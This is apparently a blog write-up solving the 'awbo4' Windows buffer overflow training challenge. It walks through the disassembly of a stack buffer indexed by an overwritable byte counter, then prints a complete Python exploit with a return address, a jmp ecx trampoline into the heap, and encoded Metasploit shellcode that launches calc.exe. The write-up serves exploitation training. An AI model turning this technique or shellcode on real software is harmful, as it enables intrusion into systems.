Advanced Windows Buffer Overflows - Take

Yet another warm summer day in the Basque Country and yet another refreshing take of VRT's very own awbo challenges. Today we will unveil a possible solutions for the 3rd test a.k.a. awbo4. The rules here remain the same as in the others: no NOP sleds, no static stack return addresses. If we feed the binary to IDA we will straightforwardly notice that the binary itself doesn't look too complex. In the main function it just calls one function at 0x00401050 which further analysis will show as a wrapper to read user input from stdin. I want to mention at this point that my lack of reversing skills got me stuck understanding how file input was read that I lost a couple of reversing sessions just doing so until finally olly's handle list enlightened me. Once the input vector was clear, the first thing we notice is that the executable parses input to a fixed stack address until char 'A' is read. This seems like a pretty clear textbook example of a stack based buffer overflow, but unfortunately there's a little more voodoo involved than just that. During execution there are essentially two counters involving the length of the input. The first one is placed inside a FILE-like structure which counts how many bytes are actually read from stdin, this input buffer is capped at a maximum of 4096 bytes and cannot be overflowed as so:
.text:00401570                 lea     eax, [ebp+NumberOfBytesRead]
.text:00401573                 push    0               ; lpOverlapped
.text:00401575                 push    eax             ; lpNumberOfBytesRead
.text:00401576                 mov     eax, [ebx]
.text:00401578                 push    [ebp+nNumberOfBytesToRead] ; 0x1000
.text:0040157B                 push    ecx             ; lpBuffer
.text:0040157C                 push    dword ptr [eax+esi] ; hFile
.text:0040157F                 call    ds:ReadFile
.text:00401585                 test    eax, eax
.text:00401587                 jnz     short readStuffThe second one is placed in the stack of the main function. It's a peculiar layout from what I encountered in the past. In this case the the local frame counter is placed after the buffer where we copy our input char-by-char. The funny fact is that at first look we can't write as much as we want because every loop the counter is AND'd with
0xFF. But since devil's in the details, lets look at this:
.text:00401070                 mov     eax, [ebp-8]    ; stack counter
.text:00401073                 and     eax, 0FFh
.text:00401078                 mov     cl, [ebp-4]
.text:0040107B                 mov     [ebp+eax-88h], cl ; write into stack buffer
.text:00401082                 mov     dl, [ebp-8]
.text:00401085                 add     dl, 1
.text:00401088                 mov     [ebp-8], dl
.text:0040108B                 jmp     short loopNotice here that even thought eax is capped at each iteration, it's then used as index to the stack buffer at
0x0040107B. This leads to a interesting situation: we can smash the counter value to write our input wherever we want but, taking care of the value not being bigger than 0xFFbecause otherwise it'll be clobbered. Now that we understand the bug, let's move onto exploitation. There are 128 bytes from the beginning of our input up to the stack counter value. This value is stored as a 4-byte unsigned integer value but as the AND operation showed us, only the first byte is used. After this 4-byte value we find the return address. In my particular exploit I decided to put the shellcode and everything after the return address because althought we're really close to the top of the stack, we cannot overflow it in such a way to cause an access violation signal because the index we use to the stack buffer is just a byte long and doesn't allow writes past this boundary. The trick I used here is that even thought we can't have our code in the stack, our whole input is stored in the memory heap. The rules say that we can't use hardcoded addresses but luck is with us this time. After returning from the main function ecx points towards the middle of our input in the heap (remember, we've just been processing it). In this situation, we will craft the exploit as follows:
# jmp ecx opcode
jmp_ecx = "\xFF\xE1"

# windows/exec - 148 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
shellcode ="\x31\xc9\xbf\xa3\xd2\x6a\x3d\xb1\x1f\xdd\xc7\xd9\x74\x24"
shellcode +="\xf4\x58\x31\x78\x0f\x83\xc0\x04\x03\x78\xa8\x30\x9f\xc1"
shellcode +="\x46\xf0\x60\x3a\x96\x72\x25\x06\x1d\xf8\xa3\x0e\x20\xee"
shellcode +="\x27\xa1\x3a\x7b\x68\x1e\x3b\x90\xde\xd5\x0f\xed\xe0\x07"
shellcode +="\x5e\x31\x7b\x7b\x24\x71\x08\x83\xe5\xb8\xfc\x8a\x27\xd7"
shellcode +="\x0b\xb7\xf3\x0c\xf0\xbd\x1e\xc7\xa7\x19\xe1\x33\x31\xe9"
shellcode +="\xed\x88\x35\xb2\xf1\x0f\xa1\xc6\x15\x9b\x34\x32\xac\xc7"
shellcode +="\x12\xc0\x6d\xa8\x6b\x3e\x11\x01\xe8\x35\x97\x9d\x7b\x09"
shellcode +="\x1b\x55\x0b\x96\x8e\xe2\x84\xae\x59\x0c\xd7\x6f\x33\xbd"
shellcode +="\xb0\x11\x1b\xdf\x32\x86\x03\xde\x3f\x58\x64\xe0\xa7\x06"
shellcode +="\xeb\x72\x4b\xe7\x8e\xf2\xee\xf7"

# return address of jmp esp in ntdll.dll : 0x78461BE3

ret = "\xE3\x1B\x46\x78"

# print everything so we can pipe it to our executable

print "B"*128+"\x88"+"C"*3+ret+jmp_ecx+"\x90"*50+shellcode+"A"As you can see, we will overwrite the counter value with
0x88 which will allow the next write to be performed beginning in main's return address and forwards. Once we return execution to the stack with the jmp esp instruction which we located inside ntdll.dll, we will assemble a jmp ecx instruction that as I said will land in the heap were our buffer remains untouched. Also notice the leading "A" which will tell the executable to stop reading user input and to exit. As always, shellcode has been borrowed from Metasploit.com and is just a simple calc.exe launcher. We can pop a nice calculator as follows:
$ ./exp.py | awbo4.exe